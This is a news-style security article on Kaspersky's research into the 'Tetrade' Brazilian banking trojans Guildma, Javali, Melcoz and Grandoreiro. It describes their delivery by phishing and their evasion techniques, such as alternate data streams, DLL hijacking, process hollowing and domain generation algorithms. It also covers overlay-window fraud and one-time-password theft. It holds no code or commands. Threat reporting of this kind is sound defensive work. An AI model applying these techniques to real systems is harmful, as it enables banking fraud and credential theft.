Recent investigations by cybersecurity experts have unveiled the presence of four distinct Brazilian banking trojan families that have launched sophisticated attacks against financial institutions in Brazil, other parts of Latin America, and Europe. Collectively identified as “Tetrade” by researchers at Kaspersky, these malware families—Guildma, Javali, Melcoz, and Grandoreiro—have significantly enhanced their operational capabilities, incorporating backdoor functions and advanced obfuscation techniques designed to elude detection by security software.
Kaspersky emphasized that this new wave of malicious activity is part of a broader strategy by Brazilian cybercriminals to expand their operations internationally, capitalizing on the fact that many banks within Brazil maintain a presence in other regions, making it easier to target customers beyond national borders. Their analysis noted that these malware families could readily extend their reach to impact customers of financial institutions operating globally.
The deployment of these trojans often follows a multi-stage process, predominantly utilizing phishing emails to deliver the initial payload. Specifically, Guildma and Javali have adapted their tactics since their initial emergence, with Guildma notably expanding its operational scope to encompass users in various Latin American countries. Recent iterations of Guildma leverage compressed email attachments and HTML files that execute JavaScript to discreetly download additional malicious components via legitimate Windows tools like BITSAdmin.
Moreover, the malware adeptly employs NTFS Alternate Data Streams to obscure its presence on infected systems. The technique of DLL Search Order Hijacking is utilized to execute malware binaries, only advancing if the environment lacks indicators of debugging or virtualization—actions typical of security measures aimed at productively identifying malware. Notably, process hollowing is employed to conceal malicious payloads within legitimate processes, further complicating detection.
Once fully operational, the final payload is programmed to monitor specific banking websites. As soon as victims access these sites, a sequence of operations is initiated, enabling cybercriminals to exploit the victim’s machine for fraudulent financial transactions. Javali, which has been in circulation since November 2017, also retrieves payloads through emails but ultimately downloads malware capable of stealing credentials and sensitive information from users engaging with cryptocurrency platforms or payment systems.
Melcoz, a variant derived from an open-source remote access tool, has been tied to multiple attacks across Chile and Mexico. This malware possesses capabilities to extract passwords, manipulate clipboard data, and even alter Bitcoin wallet addresses to benefit the attackers directly. Using VBS scripts as part of the installation process, Melcoz employs AutoIt interpreters and VMware NAT services to facilitate its nefarious activities.
Kaspersky’s research highlighted the ability of the malware to deploy overlay windows during online banking sessions, effectively hijacking user activities without detection. This sophisticated technique allows attackers to engage in fraudulent transactions directly from compromised systems, complicating the ability of anti-fraud technologies employed by banks to identify suspicious activities. Attackers can also solicit critical transaction-specific details, such as one-time passwords, successfully circumventing two-factor authentication.
The Grandoreiro malware, active since 2016, has been associated with campaigns targeting Brazil, Mexico, Portugal, and Spain. It facilitates fraudulent banking actions by exploiting the victims’ computers to navigate around conventional banking security measures. This malware’s hosting on Google Sites, combined with its distribution through compromised websites and spear-phishing attempts, employs Domain Generation Algorithms (DGA) to obfuscate command-and-control mechanisms during attacks.
Kaspersky concluded that Brazilian cybercriminals are developing a collaborative ecosystem of affiliates, recruiting international partners while embracing malware-as-a-service models. The innovations in these trojan families, such as the use of DGAs, encrypted payloads, and various evasion techniques, suggest a resiliency and adaptability intended to evade detection and continue targeting a broader array of financial institutions across numerous countries.
Through the lens of the MITRE ATT&CK framework, tactics such as initial access, persistence, privilege escalation, and others are integral to understanding the operational methods of these adversaries. The evolving landscape of these banking trojans indicates a significant and ongoing threat to both organizations and individuals within the financial sector.
